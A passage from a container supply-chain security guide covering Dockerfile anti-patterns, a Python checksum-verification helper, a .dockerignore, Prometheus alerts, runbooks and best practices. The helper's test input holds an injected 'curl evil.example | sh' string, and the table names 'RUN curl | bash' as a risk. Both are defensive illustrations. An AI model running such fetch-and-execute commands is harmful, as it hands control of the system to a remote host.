| COPY . . without .dockerignore | Source secrets, .env copied | Add .dockerignore; copy specific files |
| ENV API_KEY=secret | Secret in image layers forever | Use runtime injection: K8s Secrets or ESO |
| RUN curl \| bash | Arbitrary code execution at build time | Pin to specific version + verify checksum |
| RUN apt-get install && rm -rf /var/lib/apt | Package manager remains; packages cached | Multi-stage; apt in build stage only |
| ADD https://... /app/ | Remote content without verification | Use ADD --checksum=sha256:... with the URL, or download with curl and check the file with sha256sum -c before using it |
| No liveness/readiness probes | Kubernetes can't detect app-level failure | Define probes in the pod spec; Kubernetes ignores Dockerfile HEALTHCHECK |
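"Verify checksum" in the table means comparing the downloaded bytes against a digest pinned in the build definition, before anything is executed. A minimal sketch of that comparison follows; `verify_sha256` is a hypothetical helper, and the payload stands in for a downloaded file.

```python
import hashlib
import hmac


def verify_sha256(data: bytes, expected_hex: str) -> bool:
    """Compare the SHA-256 of `data` with a pinned hex digest."""
    actual = hashlib.sha256(data).hexdigest()
    # compare_digest avoids leaking the mismatch position through timing.
    return hmac.compare_digest(actual, expected_hex.lower())


# Pinned digest of the expected content (here: the bytes b"hello").
PINNED = "2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824"

print(verify_sha256(b"hello", PINNED))
print(verify_sha256(b"hello; curl evil.example | sh", PINNED))
```

The pinned digest must come from a trusted source such as the project's signed release notes, not from the same server that hosts the download.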

.dockerignore

# .dockerignore — always include this file
.git
.gitignore
*.md
.env
.env.*
*.key
*.pem
*.cert
*.crt
node_modules
dist
coverage
.DS_Store
Dockerfile*
docker-compose*
.github
tests
__tests__
*.test.ts
*.spec.ts

Metrics, Alerts & Runbooks

Key Metrics

| Metric | Source | Description |
|---|---|---|
| trivy_image_vulnerabilities | Trivy Operator | Per-image CVE count by severity |
| kyverno_policy_results_total | Kyverno | Policy pass/fail counts by policy name |
| kube_pod_container_status_waiting_reason | kube-state-metrics | Containers waiting on failed image pulls (ErrImagePull, ImagePullBackOff) |
| cosign_verification_duration_seconds | Custom webhook | Signature verification latency at admission |
| falco_events_total | Falco | Runtime security events by rule name |

Alerts

# Metric and label names vary by exporter version; confirm them against
# each component's /metrics endpoint before deploying these rules.

# Alert: Critical CVE in running workload
- alert: CriticalCVEInRunningWorkload
  expr: sum by (namespace, resource_name, image_repository) (trivy_image_vulnerabilities{severity="Critical"}) > 0
  for: 5m
  annotations:
    summary: "Critical CVE in {{ $labels.resource_name }} ({{ $labels.namespace }})"

# Alert: Image from untrusted registry blocked
- alert: UntrustedRegistryBlocked
  expr: increase(kyverno_policy_results_total{policy_name="restrict-image-registries",rule_result="fail"}[5m]) > 0
  annotations:
    summary: "Attempt to deploy image from untrusted registry"

# Alert: Signature verification failures spike
- alert: ImageSignatureVerificationFailure
  expr: increase(kyverno_policy_results_total{policy_name="verify-image-signatures",rule_result="fail"}[5m]) > 3
  annotations:
    summary: "Multiple image signature verification failures: possible supply chain attack"

# Alert: Falco runtime anomaly
- alert: FalcoRuntimeAnomaly
  expr: increase(falco_events_total{priority=~"CRITICAL|ERROR"}[5m]) > 0
  annotations:
    summary: "Falco detected runtime anomaly: {{ $labels.rule }}"

Runbooks

Critical CVE in Production

1. Identify affected images: kubectl get vulnerabilityreports -A
2. Check if CVE is exploitable (network path? fix available?)
3. Update base image or package, rebuild, re-sign, redeploy
4. If no fix: apply compensating controls (NetworkPolicy, seccomp)

ImagePullBackOff

1. Check events: kubectl describe pod <name>
2. Verify imagePullSecret exists and is valid
3. Verify registry is reachable from node
4. Check if admission policy mutated the image reference unexpectedly

Signature Verification Failure Spike

1. Check which images are failing: kubectl get policyreport -A
2. Verify CI pipeline is signing correctly
3. Check if public key in policy matches signing key
4. Investigate for unauthorized image push attempts

Falco Runtime Alert

1. Identify pod: kubectl get pod -n <ns> <name>
2. Capture forensics: kubectl debug -it <name> -n <ns> --image=busybox --target=<container>
3. Consider immediate isolation: remove from Service, cordon node
4. Preserve evidence before terminating pod

Registry Credential Rotation

1. Create new imagePullSecret with new credentials
2. Update ServiceAccount or pod specs
3. Roll deployments: kubectl rollout restart deployment <name> -n <ns>
4. Revoke old credentials in registry

Best Practices

1. Pin all images to digest in production

Tags are mutable. Use image@sha256: references for all production workloads. Automate digest updates with tools like Renovate or Dependabot.

2. Use distroless or scratch base images

Eliminate shell access, package managers, and unneeded utilities from production images. This removes entire attack classes post-exploitation.

3. Scan in CI and block on critical/high CVEs

Run trivy image --exit-code 1 --severity CRITICAL,HIGH in every build pipeline. Never deploy images that fail the threshold.

4. Sign every image with Cosign

Adopt keyless signing via GitHub Actions OIDC for zero key management overhead. Verify signatures at admission with Kyverno verifyImages.

5. Enforce registry allow-list at admission

Use Kyverno or ValidatingAdmissionPolicy to reject images from unapproved registries. Docker Hub images should be mirrored to your private registry before use.

6. Never bake secrets into images

Use BuildKit's --mount=type=secret for build-time secrets. Inject runtime secrets via Kubernetes Secrets or an external secrets operator, not ENV in the Dockerfile.

7. Enable AlwaysPullImages in multi-tenant clusters

The AlwaysPullImages admission plugin prevents cross-tenant image cache exploitation. Performance impact is mitigated by registry proximity (same datacenter).

8. Deploy Trivy Operator for continuous scanning

One-time CI scans miss new CVEs in running workloads. The Trivy Operator continuously scans running images and surfaces new vulnerabilities via VulnerabilityReport resources.